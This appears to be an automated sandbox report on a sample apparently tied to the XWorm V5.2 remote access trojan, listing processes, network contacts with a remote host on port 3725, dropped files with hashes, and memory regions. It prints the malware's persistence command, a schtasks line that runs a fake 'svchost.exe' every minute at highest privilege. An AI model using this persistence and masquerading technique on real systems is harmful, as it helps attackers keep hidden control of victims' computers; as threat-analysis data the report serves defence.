C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"

C:\ProgramData\svchost.exe

C:\ProgramData\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 uk1.localto.net udp
DE 80.190.85.84:3725 uk1.localto.net tcp
US 8.8.8.8:53 84.85.190.80.in-addr.arpa udp
DE 80.190.85.84:3725 uk1.localto.net tcp

Files

memory/3584-0-0x00007FFCD2ED3000-0x00007FFCD2ED5000-memory.dmp

memory/3584-1-0x0000000000CB0000-0x0000000001EF2000-memory.dmp

memory/3584-2-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/1924-3-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/4360-4-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/4360-5-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/4360-6-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agcd0qbi.piw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4360-7-0x00000166718A0000-0x00000166718C2000-memory.dmp

memory/4360-19-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

memory/1924-21-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm V5.2.exe.log

MD5 84cfdb4b995b1dbf543b26b86c863adc
SHA1 d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256 d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512 485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

memory/3584-27-0x00007FFCD2ED0000-0x00007FFCD3991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat

MD5 1a270a2d79f958a83af1ab2b5805e43c
SHA1 aeb2f51a0d1377a25fdcd614fc96fe6b3afbbeeb
SHA256 5a0ee0516cf26c772261c81a9cbc45fa625268576debb7d8b38609687554544c
SHA512 00bec3f89f9f27236adf0167d6382b60a2be56bdb6b00aae0117396e30e77a993b97d2b7f2af3ae96b81bce0b55bf177d4c4d0c272df05d72c2dc55577b14191

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2412-39-0x000001CB4A640000-0x000001CB4A684000-memory.dmp

memory/2412-40-0x000001CB4A710000-0x000001CB4A786000-memory.dmp

memory/2412-41-0x000001CB31170000-0x000001CB31178000-memory.dmp

memory/2412-42-0x000001CB4ADB0000-0x000001CB4BA2E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2979eabc783eaca50de7be23dd4eafcf
SHA1 d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256 006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA512 92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs

MD5 01ab4014ff9173b34107937c8bbd34fd
SHA1 72d0f80f0b52cafac865ae3537b94071afc09b9e
SHA256 a9357bb43016080e42f219a84ccc411e8b4b236f136f8cd90ee1f25db6275ef6
SHA512 a6407427f144f93675fce74ee77fe42e9490252ec7fb50fcba7c95f8d4734de4173dde96460d9ce0ee286fc62546c191b5ffc33e375540ee3ab77173c99c5ca3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 005bc2ef5a9d890fb2297be6a36f01c2
SHA1 0c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512 f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

memory/3452-71-0x0000000007F80000-0x0000000007FAA000-memory.dmp

memory/3452-120-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1616-122-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1120-125-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2952-124-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/3348-121-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1556-129-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1384-128-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2436-127-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/4420-126-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1708-133-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2556-131-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2928-123-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/4564-130-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1260-134-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/2512-132-0x00007FFCB1390000-0x00007FFCB13A0000-memory.dmp

memory/1512-171-0x000002A110410000-0x000002A110426000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe

MD5 8b7b015c1ea809f5c6ade7269bdc5610
SHA1 c67d5d83ca18731d17f79529cfdb3d3dcad36b96
SHA256 7fc9c7002b65bc1b33f72e019ed1e82008cc7b8e5b8eaf73fc41a3e6a246980e
SHA512 e652913f73326f9d8461ac2a631e1e413719df28c7938b38949c005fda501d9e159554c3e17a0d5826d279bb81efdef394f7fb6ff7289cf296c19e92fd924180

memory/5096-182-0x000001B752D50000-0x000001B753988000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TMzpx\TMzpx.dll

MD5 2f1a50031dcf5c87d92e8b2491fdcea6
SHA1 71e2aaa2d1bb7dbe32a00e1d01d744830ecce08f
SHA256 47578a37901c82f66e4dba47acd5c3cab6d09c9911d16f5ad0413275342147ed
SHA512 1c66dbe1320c1a84023bdf77686a2a7ab79a3e86ba5a4ea2cda9a37f8a916137d5cfec30b28ceae181355f6f279270465ef63ae90b7e8dcd4c1a8198a7fd36a8

memory/5096-190-0x000001B76EDB0000-0x000001B76F99C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bceed48e720d53a41dfa3c7c73f23f0f
SHA1 d06284e9e184a924efb235e8abc8ec19348b8c2d
SHA256 2a94a7e6d5247e4f03a36f6c9cd1e24c394bdbcdf46b9a866ad7823d0483d019
SHA512 402a0006b17a603c3a8c6ebc566579d1fe1a27e5d834ebe3cb1420d09d829ef261de2b4e62b6fce3624e93fe42dbfa21d4bb7063469c480ae4d9c5568d5df31f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96e3b86880fedd5afc001d108732a3e5
SHA1 8fc17b39d744a9590a6d5897012da5e6757439a3
SHA256 c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512 909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3db1c0d23daacf01eb99125ccc2787d3
SHA1 0849528de1ba411279231d635d8f39d54cc829d2
SHA256 bceb96f5c3d31447980eb8cd891bba75b3e5b6eb60abf4d829fc13cd8faf2582
SHA512 3d84635a3395bca1d91ce182ccfb9e38c8da87ad678704673a72d580e4251cedc5a6b2a89040a172a5687b67952e74a13673bd115bce7bdabaed06f89323de5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\ProgramData\svchost.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/1512-262-0x000002A110430000-0x000002A11043C000-memory.dmp